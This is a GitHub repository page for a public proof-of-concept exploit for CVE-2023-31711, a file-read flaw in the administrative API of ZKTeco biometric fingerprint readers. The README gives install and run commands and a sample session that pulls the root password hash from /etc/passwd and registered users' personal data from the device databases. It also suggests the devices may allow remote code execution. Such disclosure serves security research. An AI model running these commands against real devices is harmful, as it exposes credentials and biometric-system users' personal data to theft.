Skip to content
/ CVE-2023-31711 Public

Zero-day Vulnerability in ZKTEco biometric fingerprint reader.

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

HritikThapa7/CVE-2023-31711

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
pyzatt
pyzatt
 
 
README.md
README.md
 
 
__init__.py
__init__.py
 
 
console.py
console.py
 
 

Repository files navigation

CVE-2023-31711

Incorrect Access Control in ZKTECO allows remote attackers to read any file via the administrative API.

Installing required modules

  • Inside the directory ZKTEco:
    $ pip install -r ./pyzatt/requirements_dev.txt

Running the exploit

  • Inside the directory ZKTEco:
    $ python exploit.py <ip_address>
    Connected to 10.0.2.25
    (Cmd) get_file <file_name>
    Examples:
    get_file /etc/passwd: Disclosed root password's hash
    get_file /mnt/mtdblock/data/ZKDB.db: Disclosed PII of registered users. To read the contents, you might need to run this command sequentially as many times till the whole contents
    get disclosed
    get_file /mnt/mtdblock/data/ZKSystem.db: Disclosed sensitive information related to the system

Credits

Exploit: https://github.com/ProCheckUp/SafeScan

Pyzatt Module: https://github.com/adrobinoga/pyzatt

Note

The devices could be potentially vulnerable to Remote Code Execution as well through the use of the administrative API. The exploit mentioned in credits section could be a good place to find a test for it.

About

Zero-day Vulnerability in ZKTEco biometric fingerprint reader.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages